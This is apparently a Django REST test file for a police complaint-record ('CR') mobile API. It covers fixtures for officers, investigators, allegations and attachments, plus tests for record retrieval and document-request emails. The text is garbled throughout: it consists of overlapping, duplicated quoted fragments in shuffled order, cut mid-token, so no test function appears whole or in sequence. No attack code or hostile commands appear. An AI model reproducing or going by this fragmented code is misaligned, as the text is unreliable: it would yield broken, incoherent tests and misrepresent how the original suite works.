'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000',", "'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name':", "allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002,", "'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point': {", "OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, )", "'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000',", "'<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [", "28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001,", "= self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' })", "'6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>',", "Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type':", "CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = 
OfficerFactory( id=123, first_name='Mr',", "OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory(", ") InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation,", "1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', }", "import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory,", "'7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD',", "current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR',", "allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail',", "email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area", ") investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin',", 
"allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc),", "'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail',", "race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5,", ") investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document',", "allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT )", "tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest", "28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1,", "document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'}))", "{ 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000',", "pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, 
ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory,", "}, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave,", "allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1),", "'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln", "investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator,", "VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20),", "'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants':", "AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response", "'123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory(", "response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email", "'most_common_category': { 'category': 
'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id':", "'8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1,", ") AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation,", "reverse from django.contrib.gis.geos import Point from mock import patch from rest_framework.test import APITestCase", "= OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, )", "import Point from mock import patch from rest_framework.test import APITestCase from rest_framework import", "url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT )", "expect import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory,", "investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None )", "'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000',", "] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def 
test_request_document(self,", "self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email'", ") def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'}", "complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003,", "'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk':", "'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police", "2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK)", "last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation,", ") InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( 
tag='TRR',", "datetime import datetime, date from django.urls import reverse from django.contrib.gis.geos import Point from", "5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2,", "12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address':", "from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self):", "allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR", "sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2,", "investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory(", "'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "'8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000',", "Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator',", "1, 'percentile_trr': '5.5000', 
'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR document',", "allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def", "import APITestCase from rest_framework import status from robber import expect import pytz from", "'<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator',", "28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR',", "expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response", "current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456',", "mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK)", "disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment'", "PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from 
data.constants import MEDIA_TYPE_DOCUMENT from", "'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer',", "CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln", "first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789',", "expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', )", "} ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28',", "from robber import expect import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory,", "appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345',", "'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000',", ") OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28,", "investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1,", "allegation = AllegationFactory( crid='12345', 
point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave',", "investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None )", "'8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000',", "age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory(", "}, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr':", "subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation", "sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2,", "}) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({", "test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White',", "complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, 
first_name='Jerome', last_name='Finnigan', appointed_date=date(2001,", "final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' )", "'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', }", "2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory(", "point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System',", "document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/',", "'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26',", "5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward',", "AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR", "expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response", "'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point': { 'lon': 12.0, 'lat':", "tzinfo=pytz.utc), add1=3510, 
add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3,", "tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation,", "'123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email')", "kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233'", "Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [", "officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1,", "final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator", "'id': '123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 =", "allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002,", "5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( 
officer=officer, final_finding='SU', start_date=date(2003, 2, 28),", "enter a valid email' }) def test_request_document_with_invalid_allegation(self): response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND)", "'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender': 'Male',", "AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin", "internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12,", "expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response =", "= InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/',", "gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation',", "age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3,", "{ 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000',", "investigator=investigator_4, current_star=None ) 
AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory(", "OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc),", "'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD',", "InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation,", "AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from", "@patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email':", "response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel", "allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis',", "gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, 
complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1,", ") AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data()", "'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge':", "added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST)", "from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory", "= self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response =", "1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002,", "'<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self):", "expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, 
mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}),", ") OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False )", "test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a", "allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category':", "'gender': 'Male', 'age': 18 } ], 'victims': [ { 'race': 'Black', 'gender': 'Male',", "{ 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000',", "id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer,", "'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url':", "'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type':", "'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian':", "{ 'involved_type': 
'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000',", "'<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [", "'<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>',", "= AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document',", "'9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>',", "date from django.urls import reverse from django.contrib.gis.geos import Point from mock import patch", "{'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self):", "1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation", "4, 